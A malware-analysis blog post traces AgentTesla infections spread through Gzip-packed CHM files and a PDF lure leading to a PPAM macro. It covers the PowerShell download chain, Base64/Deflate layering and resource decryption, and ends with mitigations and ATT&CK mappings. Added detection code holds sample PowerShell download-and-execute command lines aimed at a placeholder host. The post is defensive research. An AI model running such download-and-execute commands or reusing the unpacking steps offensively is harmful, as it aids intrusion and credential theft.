Recent Attacks showcase AgentTesla spreading via CHM and PDF Files
- This analysis emphasizes an interesting infection pathway to disseminate AgentTesla, a well-known malware strain.
- The infection is initiated via a spam email containing a CHM file, which, upon execution, fetches a PowerShell script to start the AgentTesla infection on the victim’s system.
- The PowerShell script employs encoded binary strings as camouflage for malicious code.
- The malicious PowerShell script further drops a loader DLL file built on the .NET framework, which injects the AgentTesla payload into system executables.
- In another campaign, a PDF file is employed to entice unsuspecting users into downloading a PPAM file, resulting in AgentTesla malware infection.
AgentTesla is an information stealer built on the .NET framework, designed to infiltrate computers and surreptitiously extract sensitive information from the victim’s machine. It initially appeared in 2014, and since then, it has been continuously evolving and spreading worldwide. Its primary objective is to harvest victim credentials and personal data. Furthermore, AgentTesla possesses functionalities such as keylogging, capturing clipboard data, accessing the file system, and transferring data to a Command and Control (C&C) server.
AgentTesla typically enters a system through spam emails that include attachments with file extensions like .doc, .xls, and .ppt. These attachments often contain macros, which, when executed, facilitate the installation of the AgentTesla malware onto the victim’s system. CRIL also recently identified, and published an analysis of, a campaign in which AgentTesla reached users via malicious Control Panel files.
On October 4, 2023, CRIL encountered a malicious Gzip compressed file within VirusTotal (VT). This Gzip file contained a CHM file that triggered the initiation of the AgentTesla infection.
AgentTesla malware’s distribution through the CHM file was identified by researchers @JAMESWT_MHT in September 2022 and subsequently by @smica83 in December 2022. In previous campaigns, the CHM file downloaded the PowerShell scripts, containing loader DLL and AgentTesla as obfuscated binary strings. Finally, AgentTesla is injected into RegAsm.exe.
In the most recent campaign, CRIL identified a CHM file that has been compressed using Gzip and was most likely delivered through malicious spam email. The crafted CHM file acts as a lure. Based on the content available in the CHM file, it appears to target individuals or entities involved in network engineering, telecommunications, or information technology, as shown in Figure 1.
When the user opens this CHM file, it covertly downloads a PowerShell script from the remote server and executes it. To avoid detection, the PowerShell script is Base64-encoded and Deflated. This deflated Base64-encoded string, in turn, contains another layer of Base64 encoding, which decodes to a loader DLL file. The DLL is responsible for loading the AgentTesla malware stored in one of its resources.
We have also observed another campaign using PDF files to distribute AgentTesla Malware. This PDF employs two distinct methods to disseminate the malware. In the first method, the PDF triggers a PowerShell command to load the AgentTesla malware. The second method displays a fake message when the PDF is opened, leading to the download of a PPAM file when users click on the “Reload” button. This PPAM file is responsible for executing PowerShell commands that, in turn, download the AgentTesla malware.
AgentTesla Spreading Via CHM files:
The figure below shows the overall infection chain of the AgentTesla Campaign.
The initial phase of the infection process commences with a malicious spam email, which delivers a Gzip-compressed file named “PO-9596996.gz” with a SHA256 hash value of 5df434b86519a9cda49dacc6dd625d8b8fc70c1479004669ed09b35d37816fce. Within this Gzip archive, there is an embedded CHM file named “PO-9596996.chm”, with a SHA256 hash value of 00dc35f39503924bff98f40ac52100ab2882ed22cdf8a3e4a9ec2f1797736aaa.
Upon execution, the CHM file runs a PowerShell command that downloads a PowerShell script named “nm.txt” from a remote server and then executes it, as shown below.
The PowerShell script “nn.txt” consists of a string that has been Base64-encoded and subsequently deflated. The figure below shows the contents of “nn.txt”.
During the execution of the PowerShell script, the Base64-encoded string is decoded and then inflated, revealing another Base64-encoded string, which decodes to a malicious Dynamic Link Library (DLL). The PowerShell script then loads this decoded DLL, which is stored in the “A” variable, and creates an instance of the class “B” defined in the DLL.
The figure below shows the second base64-encoded string.
The decoded DLL is named Hur.dll and has a sha256 value of 6555ac945d8010dc3e77d037298fffaf506826bb0ecaa12880de18ad04435b7f. Within the resource section of the Hur.dll file, encrypted data is present, which is loaded and injected by the Hur.dll.
The data was encrypted by adding a single-byte key, “1A” (hexadecimal), to every byte. Subtracting this key from each byte recovers the final AgentTesla binary. The figure below shows the decrypted data.
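The unpacking chain described above (outer Base64, raw Deflate, inner Base64, then a per-byte additive key on the DLL resource) can be reproduced in an analyst script. This is an added example, not code from the original post or the malware; the loader bytes and resource are constructed stand-ins, and the key 0x1A is the one named in the write-up.

```python
import base64
import zlib

# Constructed stand-in for the embedded loader DLL; the real Hur.dll is not reproduced here.
SAMPLE_DLL = b"MZ" + b"\x90" * 14 + b"constructed-loader-stub"
RESOURCE_KEY = 0x1A  # the "1A" additive key described in the write-up


def wrap_like_script(dll: bytes) -> str:
    """Build test input with the script's layering: base64(DLL) -> raw deflate -> base64."""
    inner_b64 = base64.b64encode(dll)
    deflater = zlib.compressobj(wbits=-15)  # raw deflate, as .NET DeflateStream produces
    deflated = deflater.compress(inner_b64) + deflater.flush()
    return base64.b64encode(deflated).decode("ascii")


def unwrap_script_payload(outer_b64: str) -> bytes:
    """Peel the layers in reverse: base64 decode -> inflate -> base64 decode -> DLL bytes."""
    deflated = base64.b64decode(outer_b64)
    inner_b64 = zlib.decompress(deflated, -15)  # -15: raw deflate stream, no zlib header
    return base64.b64decode(inner_b64)


def add_key(data: bytes, key: int = RESOURCE_KEY) -> bytes:
    """Reproduce the resource encryption for test data: add the key to every byte (mod 256)."""
    return bytes((b + key) & 0xFF for b in data)


def sub_key(data: bytes, key: int = RESOURCE_KEY) -> bytes:
    """Decrypt the resource: subtract the key from every byte (mod 256)."""
    return bytes((b - key) & 0xFF for b in data)


def recover_payload(outer_b64: str, resource: bytes) -> tuple:
    """Recover the loader DLL and the decrypted resource; report whether the result has an MZ header."""
    loader = unwrap_script_payload(outer_b64)
    payload = sub_key(resource)
    return loader, payload, payload[:2] == b"MZ"
```

The MZ check is a quick sanity test that the key was right: with the key still applied, the first two bytes read "gt" rather than "MZ".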
The figure below shows the decrypted AgentTesla Malware, which calls several APIs for various malicious purposes.
AgentTesla Spreading via PDF files:
In addition to the CHM campaign, on September 8, 2023, we also observed another campaign in VirusTotal that employs a PDF file to entice unsuspecting users into downloading AgentTesla Malware. Notably, this PDF file employs two distinct methods to deliver malicious files to the victim’s machine.
In parallel, the PDF file opens a fake message stating, “Pdf reader not supported! Reload to Download pdf!” Following this pop-up, the main PDF document loads but displays an error message, as shown in the figure below.
When the user clicks on the Reload button, it triggers a redirection to the website “hxxps://booking-comdetails[.]blogspot[.]com/.” During our analysis, the website was inaccessible, but it had previously hosted a PPAM file named “lnvoice_1332936990 (1).ppam (copy).”
The PPAM file does not contain any PPT file but only the VBA macro, which contains code to download and execute the PowerShell script from the previously mentioned URL “htlbook.blogspot[.]com/atom.xml”. The figure below shows the macro code.
The latter stages of the infection technique, as executed by the downloaded PowerShell, bear a strong resemblance to the methods outlined in our earlier AgentTesla analysis.
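Both chains above end with a document handler (hh.exe for the CHM, PowerPoint for the PPAM macro) spawning PowerShell to fetch a script served under a non-script extension (nm.txt, atom.xml). The following detection logic over process-creation events is an added example, not part of the original post; the events are constructed, the URLs are placeholders, and the list of document-handler parents is an assumption to be extended with the PDF readers in use locally.

```python
import re

# Constructed process-creation events (parent image, child image, command line); not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/nm.txt')\""},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ep bypass -c \"iwr http://example.invalid/atom.xml\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},
    {"parent": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe C:\\Help\\readme.txt"},
]

# Assumed set of document handlers that have no business launching PowerShell; add local PDF readers.
DOCUMENT_HANDLERS = {"hh.exe", "powerpnt.exe", "winword.exe", "excel.exe"}
# Command-line fragments that fetch remote content.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "net.webclient")
# Remote resource with a non-script extension, as with nm.txt and atom.xml in this campaign (T1036.006).
MASQUERADED_URL = re.compile(r"https?://\S+\.(?:txt|xml)\b", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the reasons an event is suspicious; an empty list means it is not flagged."""
    if basename(event["image"]) != "powershell.exe":
        return []
    cmd = event["cmdline"].lower()
    reasons = []
    if any(marker in cmd for marker in DOWNLOAD_MARKERS):
        reasons.append("remote download in command line")
    if MASQUERADED_URL.search(cmd):
        reasons.append("payload fetched under a non-script extension")
    parent = basename(event["parent"])
    # Alert only when a document handler is the parent AND the command reaches out to the network.
    if parent not in DOCUMENT_HANDLERS or not reasons:
        return []
    return ["powershell spawned by " + parent] + reasons


def flag_events(events: list) -> list:
    return [event for event in events if classify(event)]
```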
This analysis uncovers a resourceful approach used by AgentTesla malware to proliferate. Through its continual adaptation, AgentTesla enhances its ability to elude detection, establishing itself as an enduring menace to both organizations and individuals.
AgentTesla’s primary objective is the pilfering of sensitive data, and its tactical shifts sustain its significant threat to organizations, enabling it to persistently access valuable information. Its flexibility permits the exploitation of various attack vectors, such as email attachments, malicious links, and document-based infiltrations, rendering it a versatile adversary. The ceaseless evolution of its tactics poses a formidable challenge in eradication, compelling security systems and researchers to perpetually adjust their countermeasures.
- Implement strong email filtering solutions to detect and block spam emails, phishing attempts, and malicious attachments.
- Refrain from opening untrusted links and email attachments without verifying their authenticity.
- Use a reputed antivirus and Internet security software package on your connected devices, including PC, laptop, and mobile.
MITRE ATT&CK® Techniques
| Tactic | Technique | Description |
|---|---|---|
| Initial Access (TA0001) | Phishing (T1566.001) | TAs send phishing emails with malicious attachments |
| Execution (TA0002) | User Execution (T1203) | User opens the malicious attachments |
| Execution (TA0002) | Command and Scripting Interpreter | PowerShell commands are used to download and execute additional payloads on the system |
| Persistence (TA0003) | Registry Run Keys / Startup Folder (T1547.001) | Malware adds a Run entry or Startup item for persistence |
| Defense Evasion (TA0005) | Masquerading (T1036.006) | PowerShell script masquerades as a text file |
| Collection (TA0009) | Data from Local System | The malware collects sensitive data from the local system |
| Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1437.001) | Communicates with the C&C server over HTTP |
| Exfiltration (TA0010) | Exfiltration Over C2 Channel (T1041) | Data is exfiltrated over the C2 channel |
Indicators of Compromise (IOCs)